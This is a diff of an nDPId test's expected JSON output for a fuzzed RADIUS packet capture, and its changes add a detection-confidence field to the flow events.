 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1528998314309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998314309,"pkt":"ABRP+4pIcNuYVcUnCABFAAClDKJAAPwRR2TG4hk1ClFAHgcUchAAkVZiC6QAiXXtUkUY2UEpsUhCUrecX98BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6NTM6MGM6OWIvMjQwTw4BAAAMFwwAAAwBf\/xQEi8FyNCyWjoJnDm8uRInVVc="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314512,"flow_last_seen":1528998314512,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528998314512,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":43028,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1528998314512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1528998314512,"pkt":"ABRP+4rqcNuYVcUnCABFAADADKZAAPwRR0XG4hk1CgxAHqgUchAArLr7A6UApAJ1Pjz8JGCwuo5GIgtQcZwBNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm5yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6QjM6MGM6OWIvMjQwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92a3Npa25lZE8HBAEABwBQEil3cnDy8\/cVSnBQY7FdIyI="}
 01261{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528998315379,"pkt":"AAAMB6xAABRPC4rqCABFAHfHIVdAAP8RAAAKDEAexuIZNXIQBxQCswAAAXcCq7birWrbSCR0XX2ECsyLDxcaCgAAVcgOBFVTGgwAAFfIDQZ3aWZp7g8AEFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqmrATUwMzExNDgwMDczNlA4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtN6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":312,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691}
 00721{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17152,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998315564,"pkt":"ABRU+4rqcNuYVcUnQwBFAAEwDOpAAPwRRszG4hk1CgxAHgcUchABHIc+AicBFAVYRP7z9BnlCK2x3nMNu9caCwAAV8gbBVNQQ\/1uAAABNxA0lSfZbnfLLhoh4+5ALjW4bpaGB\/F5lLUmaXWeOTpERaZCygHBXW8G5d8wRSUAsOoyXuERNO7GEB2l9DfyYkq5gsPl9gYDdVKWsTzavhi3cpWL4d4hWImwBdGLigMB9OjFS4NJg5i2ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29iay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBKDY\/Qv9KooB2GY4bCH4+IC"}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":313,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17152}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":314,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998322857,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":314,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1528998226997,"flow_last_seen":1528998315061,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":16008,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1528998322857,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":314,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998322857,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":314,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1528998226997,"flow_last_seen":1528998315061,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":16008,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1528998322857,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00595{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":314,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998322857,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00613{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"ts_msec":1528998323044,"pkt":"ABRP+0zqcNuYVcUnCABFAAAlAL1AEPwRRw3G4hk1CgxAHgcUchAAzTbHC6gAxWfYqv2MMmfQQQEjLJV5MYwBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA3T0oBAgBIFwEAAAEFAAASnKqRiXtNkJ7pl81Lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":315,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":205}
 00718{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998323568,"pkt":"ABRP+4rqcNsYVcUnCACOAAEwDMFAAPwRRrrG4hk1CgxAHgcUchABHN46AqkBFC7XsmGo9thH1H39z75ZofsaCwAAV8gbBVNQQxpuAAABNxA01fgke7cAxvNUQc8fbhbu8Vj1f4ydqDyFV6zE3SwbdURor5DaN1W5275SM8SlmfBSLKIRNMdp\/4Zs6S04Xowx3iRvmA3n8taa5E4m8wpB3etCd2VzmAkdeZLlem0oTIzBlWNTWH1RATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jSzgwLm1jYzMxMS4zZ3BwbmV0d2Vyay5vc04sIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBLs7b4ERJr4qPbI12xbGqC0"}
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":317,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998338204,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998338204,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01289{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528998338204,"pkt":"AAAMB6xAABRP+4rqCABFAALbIVpEAP8RAAAKDEAexuIZNXIQBxQCxwAAAaoCv2Uj1+ujspK2VyIvdisE+iUaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":318,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1528998338382,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998338382,"pkt":"ABQlAIrqcNuYVcUnCABFAADhDOxAAPwRRt7G4hk1CgxASQcUchAAzQ2+C6oAxV4x6AhgYl+1t\/7aBLDTkJgBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Y6MzcvMjM3T0oBAgBIFwEAAAEFAAD9ndZ8FHhsyj5jhEswY1t0AgUAABpKKGv5SQAALFBpvDseP8KLAQACCwUAAC1HLAQoI0jpYeW4fPFsl+tQEgCJjyegSbpAOXlBuPG4l8E="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998338382,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00720{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998338865,"pkt":"ABRP+4rq8NuYVcUnCABFAAEwDPCkAPwRRos14hk1CgxAHgcUchABHImMAqsBFPNe2aGl6LP5y1u\/scR1o3AaCwAAV8gbBVNQOBpuAAABNxA0yJ0HwRo2kUg5GkMLWv3LIW9bZ\/+pjZx0CoGr7LPlqjfgOPOLXgeADm9RiTIaXTD+uAsRNK2vP2ZsGXahxC9sjBUhoGJOMJlzjqJyAyTjvpVvse28Qg5S9JgwmD8p+ZaQYnYBaM5xATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0JQByay5vcmcsIDViMjJhOTUyL2YwOjc5OjYwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIrffGqrk1JHmvfqoB\/bRcD"}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":321,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284}
 01289{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528998342492,"pkt":"AAAMB6xAABRP+4rqCABFAMrbIVxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAawCvx+brty2uhj+WwEK9jJ7XPQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICSUASVNQUjEwGgkAADghDQM0NwZbIqnGATUwMzExNDgwMDczNjM4WTcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vciUAAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlQml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIycmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAgAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm8lABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgXGVZdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
@@ -485,50 +485,50 @@
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1528998346991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998346991,"pkt":"ABRP+4rqcNuTVcUnCABFAADhDRdAAPwRRrPG4hk1CgxAHgcUchgAzQnPC64AxTy6++0fAX35UVXUpCEgeNcBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjAlADk6QTA6ZCUAN2Q6MzcvMjM3T0oBAgBIFwEAAAEFAAB+LhDHIi3oCVbmy0rSchdaAgUAAJdIOUyErgAA73piWKcgvT+LAQACCwUAAEZfsVUxfYxGJMfW\/6iCQHdQEgwvQS2NfxbBCfFadP4Rx2E="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
